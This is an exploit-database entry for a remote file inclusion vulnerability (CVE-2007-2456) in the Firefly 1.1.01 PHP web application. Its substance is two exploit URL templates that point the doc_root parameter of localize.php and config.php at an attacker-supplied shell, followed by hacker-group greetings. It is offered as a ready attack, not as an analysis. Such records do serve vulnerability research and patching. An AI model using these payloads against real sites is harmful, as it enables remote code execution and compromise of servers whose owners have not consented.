Firefly 1.1.01 - 'doc_root' Remote File Inclusion

Author: Alkomandoz Hacker
type: webapps
platform: php
port: 
date_added: 2007-04-25 
date_updated:  
verified: 1 
codes: OSVDB-35702;CVE-2007-2456;OSVDB-35701 
tags: 
aliases:  
screenshot_url:  
application_url: 

# firefly 1.1.01 <=  Remote File Include Vulnerablitiy
# D.Script: http://fresh.t-systems-sfr.com/unix/src/privat2/firefly-1.1.01.tar.gz
# Discovered by: Alkomandoz Hacker
# Homepage: asb-may.net & mohandko.com & sniper-sa.com & Tryag.com

====================================
# Exploit:[Path]/modules/admin/include/localize.php?doc_root=Shell
# Exploit:[Path]/modules/admin/include/config.php?doc_root=Shell

====================================

# Greetz To:   AsbMay's Group & City Of Ghosts Team & Sniper-sa Team & No4Hard

# milw0rm.com [2007-04-26]